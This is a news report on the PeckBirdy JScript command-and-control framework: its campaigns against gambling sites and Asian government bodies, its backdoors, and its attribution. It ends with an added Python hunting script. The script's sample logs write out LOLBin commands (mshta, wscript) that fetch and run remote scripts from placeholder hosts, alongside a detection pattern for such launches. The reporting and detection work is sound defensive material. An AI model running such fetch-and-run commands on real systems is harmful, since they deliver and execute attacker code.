
Cybersecurity researchers have discovered a JScript-based command and control (C2) framework called PeckBirdy. This framework has been used by Chinese-aligned APT actors to target multiple environments since 2023.
According to Trend Micro, this flexible framework is being used in malicious activity targeting China’s gambling industry as well as government and private organizations in Asia.
“PeckBirdy is a script-based framework that has advanced functionality but is implemented using JScript, an older scripting language,” said researchers Ted Lee and Joseph C Chen. “This is to allow the framework to be launched across different execution environments via LOLBins (living-off-the-land binaries).”
The cybersecurity firm announced in 2023 that it had identified the PeckBirdy scripting framework after observing malicious scripts being injected into multiple Chinese gambling websites. This script is designed to download and execute the main payload to facilitate remote delivery and execution of JavaScript.
The ultimate goal of this routine is to provide a fake Google Chrome software update web page to trick users into downloading and running a fake update file, infecting their machines with malware in the process. This activity cluster is tracked as SHADOW-VOID-044.

SHADOW-VOID-044 is one of two transient intrusion sets detected using PeckBirdy. A second campaign, first observed in July 2024 and dubbed SHADOW-EARTH-045, targets government and private organizations in Asia, including educational institutions in the Philippines, by inserting PeckBirdy links into government websites and potentially providing scripts to harvest credentials on the websites.
“In one case, the injection was made into a government system login page, while in another incident, we observed attackers using MSHTA to run PeckBirdy as a remote access channel for lateral movement within civilian organizations,” Trend Micro said. “The attackers behind the attack also developed a .NET executable to launch PeckBirdy using ScriptControl. These findings demonstrate that PeckBirdy’s design is versatile, allowing it to accomplish multiple objectives.”
What’s remarkable about PeckBirdy is its flexibility: it can run in a variety of execution environments, including web browsers, MSHTA, WScript, Classic ASP, Node.js, and .NET (ScriptControl). The framework’s server is configured to support multiple APIs that allow clients to retrieve landing scripts for different environments through HTTP(S) queries.
The API path includes an “ATTACK ID” value, a random but predefined 32-character string (e.g. o246jgpi6k2wjke000aaimwбe7571uh7), that determines which PeckBirdy script to retrieve from the domain. When PeckBirdy is started, it identifies the current execution context, generates a unique victim ID, and persists it for subsequent executions.
After the initialization step, the framework tries to figure out which communication methods are supported in the environment. PeckBirdy uses the WebSocket protocol by default to communicate with the server, but it can also fall back to Adobe Flash ActiveX objects or Comet-style HTTP connections.

Once the connection with the remote server is initiated and the attack ID and victim ID values are passed, the server responds with a second-stage script; one such script can steal cookies from websites. One of the PeckBirdy servers associated with the SHADOW-VOID-044 campaign was found to be hosting additional scripts:
- An exploitation script for a Google Chrome flaw in the V8 engine (CVE-2020-16040, CVSS score: 6.5), patched in December 2020
- A social engineering popup script designed to trick victims into downloading and running a malicious file
- A script delivering a backdoor executed via Electron JS
- A script establishing a reverse shell over a TCP socket
Further analysis of the infrastructure identified two backdoors called HOLODONUT and MKDOOR.
- HOLODONUT: A .NET-based modular backdoor that is launched using a simple downloader named NEXLOAD and can load, run, or remove different plugins received from the server.
- MKDOOR: A modular backdoor that can load, run, or uninstall different modules received from the server.

SHADOW-VOID-044 and SHADOW-EARTH-045 are suspected to be associated with various nation-state actors affiliated with China. This assessment is based on the following clues:
- GRAYRABBIT, a backdoor previously deployed by UNC3569 along with DRAFTGRAPH and Crosswalk following the exploitation of N-day security flaws, is said to reside on servers operated by SHADOW-VOID-044.
- HOLODONUT shares a link to another backdoor, WizardNet, which is attributed to TheWizards.
- A Cobalt Strike artifact hosted on a SHADOW-VOID-044 server is signed using a certificate that was used in the 2021 BIOPASS RAT campaign, which targeted Chinese online gambling companies via watering hole attacks.
- Similarities exist between BIOPASS RAT and MKDOOR: both open and listen on an HTTP server on a high-numbered port on the local host.
- SHADOW-EARTH-045 uses 47.238.184[.]9, an IP address previously linked to Earth Baxia and APT41.
- Files downloaded in SHADOW-EARTH-045 activity are associated with the threat actor known as Earth Lusca (also known as Aquatic Panda or RedHotel).
“These campaigns leverage PeckBirdy, a dynamic JavaScript framework, to exploit non-existent binaries and distribute modular backdoors such as MKDOOR and HOLODONUT,” Trend Micro concluded. “Detection of malicious JavaScript frameworks remains a major challenge as they use dynamically generated, runtime-injected code and lack persistent file artifacts, allowing them to bypass traditional endpoint security controls.”
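Because the framework leaves no file on disk, the launch itself is the observable: a LOLBin such as mshta.exe or wscript.exe started with a remote script URL whose path carries a 32-character attack ID. The hunting script below is an added example, not Trend Micro’s tooling; it assumes a pipe-delimited process-creation log format and uses constructed sample lines.

```python
"""Hunt for the PeckBirdy launch pattern described above: a script LOLBin
started with a remote URL, optionally carrying a 32-character "attack ID"
path segment. Log layout (timestamp|host|parent|image|command line) is an
assumption for this example; the sample lines are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional

LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A whole path segment of exactly 32 lowercase letters/digits (the attack ID shape).
ATTACK_ID_RE = re.compile(r"/([a-z0-9]{32})(?:[/?]|$)")


@dataclass
class Finding:
    host: str
    image: str
    url: str
    attack_id: Optional[str]
    severity: str


def parse_line(line: str) -> dict:
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent,
            "image": image.lower(), "cmdline": cmdline}


def analyze(line: str) -> Optional[Finding]:
    rec = parse_line(line)
    if rec["image"].rsplit("\\", 1)[-1] not in LOLBINS:
        return None
    m = URL_RE.search(rec["cmdline"])
    if not m:
        return None  # local script argument: not the remote-launch pattern
    url = m.group(0)
    aid = ATTACK_ID_RE.search(url)
    # Remote script via LOLBin is already suspicious; attack-ID shape raises it.
    severity = "high" if aid else "medium"
    return Finding(rec["host"], rec["image"], url, aid.group(1) if aid else None, severity)


def hunt(lines: List[str]) -> List[Finding]:
    return [f for f in (analyze(l) for l in lines) if f]


SAMPLE_LOGS = [  # constructed sample data, placeholder hosts and IDs
    "2024-07-02T10:01:11Z|ws-17|explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe https://cdn.example.invalid/api/deadbeefdeadbeefdeadbeefdeadbeef/load",
    "2024-07-02T10:02:30Z|ws-17|cmd.exe|C:\\Windows\\System32\\wscript.exe|wscript.exe C:\\Users\\u\\logon.js",
    "2024-07-02T10:03:05Z|ws-22|svchost.exe|C:\\Windows\\System32\\wscript.exe|wscript.exe //b http://203.0.113.5/s.js",
    "2024-07-02T10:04:00Z|ws-22|explorer.exe|C:\\Program Files\\App\\app.exe|app.exe https://update.example.invalid/x",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f"[{f.severity}] {f.host} {f.image} -> {f.url} attack_id={f.attack_id}")
```

Feeding real process-creation telemetry through `hunt` surfaces the MSHTA/WScript remote-launch cases; the attack-ID regex is a shape heuristic and should be paired with parent-process and network context before alerting.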
